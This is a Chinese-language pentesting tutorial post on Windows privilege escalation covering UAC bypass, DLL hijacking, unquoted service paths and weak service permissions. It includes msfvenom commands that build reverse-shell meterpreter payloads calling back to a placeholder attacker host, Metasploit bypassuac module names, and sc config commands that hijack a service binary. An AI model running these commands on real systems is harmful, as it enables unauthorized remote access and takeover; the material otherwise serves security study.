by: jiaojiao

权限提升-win-UAC&DDL劫持&未引号路径&可控服务&全检项目

UAC(User Account Control 的缩写,即用户账户控制)

win7之后有

win+R输入msconfig

就是我们平常弹出来的 “是否允许此应用对你的设备进行修改”

Win10&11-BypassUAC 自动提权-MSF&UACME

为了远程执行目标的 exe 或者 bat 可执行文件需要绕过此安全机制

在用户到系统权限自动提权中也学通过 BypassUAC 实现自动化提权

绕过项目:MSF 内置,Powershe11渗透框架,UACME项目(推荐)

开启 UAC 和未开启 UAC 时,CS/MSF 默认 getsystem 提权影响(进程注入等)

msfvenom -p windows/meterpreter/reverse_tcp lhost=xx xx.xx.xx lport=xx -f exe -o msf.exe

1、MSF 模块:

 use exploit/windows/local/askuse  #钓鱼式的 一般不推荐
 use exploit/windows/local/bypassua   #针对win7
 use exploit/windows/local/bypassuac_sluihijack  #针对win10、11
 use exploit/windows/local/bypassuac_silentcleanup  #针对win10、11

2、UACME 项目

https://github.com/hfiref0x/UACME

Akagi64.exe 编号 调用执行

编译sln为exe

WindowS-DLL劫持提权应用配合MSF-FlashFXP

原理:

windows 程序启动的时候需要 DLL。如果这些 DLL不存在,则可以通过在应用程序要查找的位置放置恶意 DLL来提权。通常,windows 应用程序有其预定义好的搜索DLL 的路径,它会根据下面的顺序进行搜索:

 1、应用程序加载的目录
 2、C:\Windows\System32
 3、C:\Windows\System
 4、C:\Windows
 5、当前工作目录Current Working Directory,CWD
 6、在 PATH 环境变量的目录(先系统后用户)

取决于对这个目录的操作权限

过程:

信息收集-进程调试-制作 d11 并上传-替换 a11-等待启动应用成功

获取权限后 看到这个软件 然后自己从网,上下载,看这个exe运行的时候 会加载哪些d

检测:

火绒剑项目:https://github.com/anhkgg/anhkgg-tools

利用火绒剑进行进程分析加载 DLL,一般寻程序 DLL, 利用。

msf上线

 msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=xx-f dll -o xiaodi.dll

提前信息收集相关软件及 DLL 问题程序,本地调试成功后覆盖 DLL 实现利用

触发的方式:

1.服务器开机自动加载

2.管理员自动打开

Windows-不带引号服务路径配合 MSF-MacroExpert

原理:

服务路径配置由于目录空格问题,可上传文件配合解析恶意触发执行

路径带空格并且没有使用引号,存在安全问题

过程:

检测服务权限配置-制作文件并上传-服务路径指向解析-等待调用成功

检测命令:

 wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
 ​
 上传反弹 exe,设置好对应执行名后,执行sc start "Macro Expert"

利用:

只要执行c:\program files(x86)\grasssoft\macro)expertiMacroservice.exe服务,msf就可以上线

win2012-不安全的服务权限配合MSF-NewServices

原理:

即使正确引用了服务路径,也可能存在其他漏洞。由于管理配置错误,用户可能对服务拥有过多的权限,例如,可以直接修改它导致重定向执行文件。

过程:

检测服务权限配置-制作文件并上传-更改服务路径指向-调用后成功

检测脚本:

 accesschk.exe -uwcqv "" *
 accesschk.exe -uwcqv "administrator" * #检测这个用户所能操作的服务权限
https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk 
 sc config "test" binpath= "C:\Program.exe"
 sc start test

sc config "test" binpath= "C:\Program.exe" 主要作用是修改名为 test 的系统服务的可执行文件路径。

  • sc:是 Windows 的服务控制命令行工具,用于管理系统服务(创建、启动、停止、配置等)。
  • config "test":表示要配置名为 test 的服务(test 是服务的名称,而非显示名称)。
  • binpath= "C:\Program.exe":指定服务对应的可执行文件路径,这里将路径设置为 C:\Program.exe(注意 binpath= 后面有一个空格,这是 sc 命令的语法要求)。

比较鸡肋 安装的软件都是administrator或者安装的管理员用户有权限 普通用户一般没有权限 但是administrator直接msf getsystem提权就可以

综合类检测项目

https://github.com/carlospolop/PEASS-ng

IPEAS-ng 适用于windows 和 Linux/Unix*和MacOs 的权限提升工具。

 winPEAS.bat > result.txt
 winPEASany.exe log=result.txt

找到的信息 根据当前获取的权限所决定

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注